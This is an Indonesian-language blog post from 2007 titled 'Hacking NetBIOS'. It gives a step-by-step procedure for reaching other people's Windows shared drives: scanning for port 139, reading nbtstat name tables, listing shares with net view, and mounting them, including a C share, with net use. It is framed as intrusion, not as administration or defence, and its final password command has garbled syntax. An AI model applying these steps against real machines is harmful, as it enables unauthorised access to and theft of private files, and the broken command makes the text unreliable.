Monday, July 9, 2007

Hacking NetBIOS

NetBIOS merupakan singkatan dari Network Basic Input Output System dan digunakan oleh Windows untuk kebutuhan file dan printer sharing

1. NetBIOS
Untuk menggunakan NetBIOS komputer harus dalam keadaan unprotected (firewall,policy,whatever). Untuk mengetahui apakah NetBIOS telah aktif adalah dengan menggunakan portscanner lalu scan komputer ...

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

jika hasilnya seperti di atas maka NetBIOS telah aktif

2.nbtstat
Untuk mendapat informasi yang di butuhkan, gunakan program yang bernama nbtstat :
dengan cara membuka DOS-prompt

c:\>nbtstat -A 127.0.0.1

gunakan -A jika anda menggunakan ip address, jika menggunakan hostname pakai -a
program tersebut akan memberikan informasi yang disebut nametable :

Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

         NetBIOS Remote Machine Name Table

     Name               Type         Status
  ---------------------------------------------
  computername      <00>  UNIQUE      Registered
  workgroupname     <00>  GROUP       Registered
  computername      <20>  UNIQUE      Registered
  workgroupname     <1e>  GROUP       Registered
  workgroupname     <1d>  UNIQUE      Registered
  ..__MSBROWSE__.   <01>  GROUP       Registered

  MAC Address = xx-xx-xx-xx-xx-xx
pada baris
computername      <20>  UNIQUE      Registered
<20> berarti filesharing telah di enable >> itu berarti kita dapat konek ke komputer tersebut.
Pertama, kita harus mengetahui nama-nama drive pada komputer tersebut. Untuk mengetahuinya kita dapat menggunakan perintah net view \\ipaddress (pada DOS-prompt)
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name  Type  Used as  Comment

-----------------------------------
SharedDocs  Disk
The command completed successfully.
hasil akan berbeda pada os non-WinXP
interesting part : kita ingin menggunakan dan me-browse drive komputer tersebut seperti terpasang secara local. Untuk melakukannya, kita menggunakan program yang disebut net use
net use drive:\\ipaddress\sharename
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
sekarang drive telah "mirrored" ke drive letter yang tadi telah di tentukan (dalam contoh "g" dan "h"). Sekarang kita tinggal me-browse seperti pada local drive yang lain
c:\>cd g:
g:\>
Pada Windows XP anda dapat membukanya juga di my computer.
Jika telah selesai, pastikan anda menghapus shared drive tadi dari komputer:
c:\>net use /delete g:
g: was deleted successfully.
Pada beberapa system bisa jadi terkunci oleh password.
Jika anda mengetaui passwordnya, anda tinggal menggunakan perintah ini :
net use password \\ip\sharename


at 2:04 PM

Posted by .: andri setiawan :.

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)